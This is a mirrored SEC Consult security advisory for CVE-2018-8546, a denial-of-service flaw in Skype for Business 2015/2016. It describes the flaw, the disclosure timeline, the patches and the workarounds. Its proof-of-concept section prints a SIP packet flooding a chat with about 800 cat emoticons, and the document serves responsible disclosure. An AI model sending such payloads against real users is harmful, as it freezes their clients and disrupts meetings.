what you don't know can hurt you

Microsoft Skype 2015 / 2016 Denial Of Service

Microsoft Skype 2015 / 2016 Denial Of Service
Posted Nov 21, 2018
Authored by Sabine Degen | Site sec-consult.com

A large number of emojis received in one message by the Skype For Business client freezes the program for a few seconds. This can be exploited to perform denial of service attacks against Skype for Business users and compromises the availability of the program. Affected includes Skype for Business 2015 (Lync 2013) before version 15.0.5075.1000 and Skype for Business 2016 before version 16.0.4756.1000.

tags | exploit, denial of service
advisories | CVE-2018-8546
MD5 | 0134e3427becbd4819ebcaa8bc17eb55

Microsoft Skype 2015 / 2016 Denial Of Service

Change Mirror Download
SEC Consult Vulnerability Lab Security Advisory < 20181114-0 >
=======================================================================
title: Denial of Service
product: Microsoft Skype for Business 2016 / Lync 2013
vulnerable version: Microsoft Skype for Business 2015 (Lync 2013) before
v15.0.5075.1000
Skype for Business 2016: before v16.0.4756.1000
fixed version: Microsoft Skype for Business 2015 (Lync 2013) v15.0.5075.1000
Skype for Business 2016 v16.0.4756.1000
CVE number: CVE-2018-8546
impact: Medium
homepage: https://www.skype.com/en/business/
found: 08/2018
by: Sabine Degen (Office Vienna)
SEC Consult Vulnerability Lab

An integrated part of SEC Consult
Europe | Asia | North America

https://www.sec-consult.com

=======================================================================

Vendor description:
-------------------
"Skype for Business (formerly Microsoft Office Communicator and Microsoft
Lync) is an instant messaging client used with Skype for Business Server or
with Skype for Business Online (available with Microsoft Office 365).
Skype for Business is enterprise software."

Source: https://en.wikipedia.org/wiki/Skype_for_Business


Business recommendation:
------------------------
Assess the impact of this vulnerability on your business. The patch
provided by Microsoft should be installed immediately. Especially if
Skype for Business is being used for external communication.


Vulnerability overview/description:
-----------------------------------
A large number of emojis (e.g. ~800 kittens) received in one message by the Skype
For Business client freezes the program for a few seconds. This can be
exploited to perform Denial of Service attacks against Skype for Business
users and compromises the availability of the program.

For example, an attacker can continuously send such messages to the chat
window of a meeting room in order to freeze the program for all participants
and prevent them from using the chat or seeing the video.

Note that the sound and video stream is handled by a separate thread and
therefore are not affected (e.g. killed), only the functions related to
graphical user interface become unusable.


Proof of concept:
-----------------
After sending a big amount of emojis (~800 kittens) to a Skype for Business
chat, the program freezes for a few seconds while rendering the chat window.
Continuously sending emojis will make the GUI unusable for the user.
Ongoing conference calls are not affected or interrupted.

The following SIP packet illustrates the attack.

MESSAGE sip:xxx@*redacted*;opaque=user:epid:EwWlc9DdAFGQtozR4vBibAAA;gruu SIP/2.0
Via: SIP/2.0/tls 127.0.0.1:7490
From: <sip:lyncdummy@*redacted*>;tag=82254700;epid=e67b0162bec8
To: <sip:xxx@*redacted*>;tag=5c302cb624;epid=15347556e6
Max-Forwards: 70
CSeq: 12 MESSAGE
User-Agent: Purple/2.12.0 Sipe/1.23.2 (win-i386; RTC/5.0)
Call-ID: 440Eg2C92a5C4Ci0A43m5DDAt76CEb3DEAx13B0x
Route:
<sip:*redacted*:5061;transport=tls;opaque=state:T:F:Eu:Ci.R5a4100;lr;ms-route-sig=ey6XhfVINhLjEiZxqAoCWXcGmObktXoI0nG0AvGmdXYEuYRT6e8Utq9wAA>
Contact: <sip:lyncdummy@*redacted*;opaque=user:epid:cfMFfITMsFCxsLbx1gL31gAA;gruu>
Content-Type: text/plain;
charset=UTF-8;msgr=WAAtAE0ATQBTAC0ASQBNAC0ARgBvAHIAbQBhAHQAOgAgAEYATgA9AE0AUwAlADIAMABTAGEAbgBzACUAMgAwAFMAZQByAGkAZgA7ACAARQBGAD0AOwAgAEMATwA9ADAAOwAgAFAARgA9ADAAOwAgAFIATAA9ADAADQAKAA0ACgA
Content-Length: 4420
Authorization: TLS-DSK qop="auth", opaque="174C6224", realm="SIP Communications
Service", targetname="*redacted*", crand="1126134f", cnum="29", response="*redacted*"

(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat)
(cat)(cat)(cat)(cat)(cat)(cat)(cat)(cat) [...]


Vulnerable / tested versions:
-----------------------------
The following versions have been identified as vulnerable which were
the latest versions available at the time of the test:

* Lync 2013 (15.0) 64-Bit part of Microsoft Office Professional Plus 2013
* Skype for Business 2016 MSO (16.0.93).64-Bit,

Both versions were running on Windows 10 Pro.

According to the vendor, all previous versions are affected:
* Skype for Business 2015 (Lync 2013) before v15.0.5075.1000
* Skype for Business 2016: before v16.0.4756.1000


Vendor contact timeline:
------------------------
2018-08-02: Vulnerability details submitted to Microsoft,
MSRC Case 47060aassigned
2018-08-28: Asking for a status update
2018-08-30: Vendor: issue has been reproduced, solution to block the user
provided
2018-08-31: Follow-up questions why DoS is not categorized as security issue
as the provided workaround is not effective for attacks already
in progress
2018-08-31: Vendor: decided to fix the issue, rollout planned for early October
2018-09-03: Agreed to release advisory after mid October
2018-10-10: Asking for a status update
2018-10-10: Microsoft: Issue has been fixed on October 2nd, CVE number will be
assigned soon.
2018-10-10: Asking for affected versions, advisory notes
2018-10-10: Microsoft: KB #4461446 and #4092445
2018-10-10: Reviewing KB articles, asking Microsoft why there is no mention of
the security fix in #4092445
2018-10-11: Microsoft: there was a mistake, the patch needs to be re-released
as security fix, agreed on postponing until next Patch Tuesday in
November
2018-10-15: CVE number CVE-2018-8546 provided on Patch Tuesday
2018-11-14: Coordinated release of security advisory


Solution:
---------
Apply the security patches provided by the vendor. The fixed versions are:
* Skype for Business 2015 (Lync 2013) version 15.0.5075.1000
* Skype for Business 2016 (KB4092445) version 16.0.4756.1000

Microsoft provided the following links for further information:
https://support.microsoft.com/en-us/help/4461446/october-2-2018-update-for-skype-for-business-2015-lync-2013-kb4461446
https://support.microsoft.com/en-us/help/4092445/october-2-2018-update-for-skype-for-business-2016-kb4092445


Workaround:
-----------
Disable emoticons in Skype for Business:
Tools -> Options -> IM -> Show emoticons in messages

Or block the user performing the DoS attacks by right-clicking on the contact
and "Change Privacy Relationship", then click "Blocked Contacts"
(of course this will only work when there is no active DoS attack)


Advisory URL:
-------------
https://www.sec-consult.com/en/vulnerability-lab/advisories/index.html


~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

SEC Consult Vulnerability Lab

SEC Consult
Europe | Asia | North America

About SEC Consult Vulnerability Lab
The SEC Consult Vulnerability Lab is an integrated part of SEC Consult. It
ensures the continued knowledge gain of SEC Consult in the field of network
and application security to stay ahead of the attacker. The SEC Consult
Vulnerability Lab supports high-quality penetration testing and the evaluation
of new offensive and defensive technologies for our customers. Hence our
customers obtain the most current information about vulnerabilities and valid
recommendation about the risk profile of new technologies.

~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~
Interested to work with the experts of SEC Consult?
Send us your application https://www.sec-consult.com/en/career/index.html

Interested in improving your cyber security with the experts of SEC Consult?
Contact our local offices https://www.sec-consult.com/en/contact/index.html
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~

Mail: research at sec-consult dot com
Web: https://www.sec-consult.com
Blog: http://blog.sec-consult.com
Twitter: https://twitter.com/sec_consult

EOF S. Degen / @2018

Login or Register to add favorites

File Archive:

September 2020

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Sep 1st
    20 Files
  • 2
    Sep 2nd
    15 Files
  • 3
    Sep 3rd
    15 Files
  • 4
    Sep 4th
    4 Files
  • 5
    Sep 5th
    1 Files
  • 6
    Sep 6th
    1 Files
  • 7
    Sep 7th
    15 Files
  • 8
    Sep 8th
    27 Files
  • 9
    Sep 9th
    7 Files
  • 10
    Sep 10th
    16 Files
  • 11
    Sep 11th
    9 Files
  • 12
    Sep 12th
    0 Files
  • 13
    Sep 13th
    0 Files
  • 14
    Sep 14th
    25 Files
  • 15
    Sep 15th
    15 Files
  • 16
    Sep 16th
    15 Files
  • 17
    Sep 17th
    15 Files
  • 18
    Sep 18th
    12 Files
  • 19
    Sep 19th
    0 Files
  • 20
    Sep 20th
    0 Files
  • 21
    Sep 21st
    0 Files
  • 22
    Sep 22nd
    0 Files
  • 23
    Sep 23rd
    0 Files
  • 24
    Sep 24th
    0 Files
  • 25
    Sep 25th
    0 Files
  • 26
    Sep 26th
    0 Files
  • 27
    Sep 27th
    0 Files
  • 28
    Sep 28th
    0 Files
  • 29
    Sep 29th
    0 Files
  • 30
    Sep 30th
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2020 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close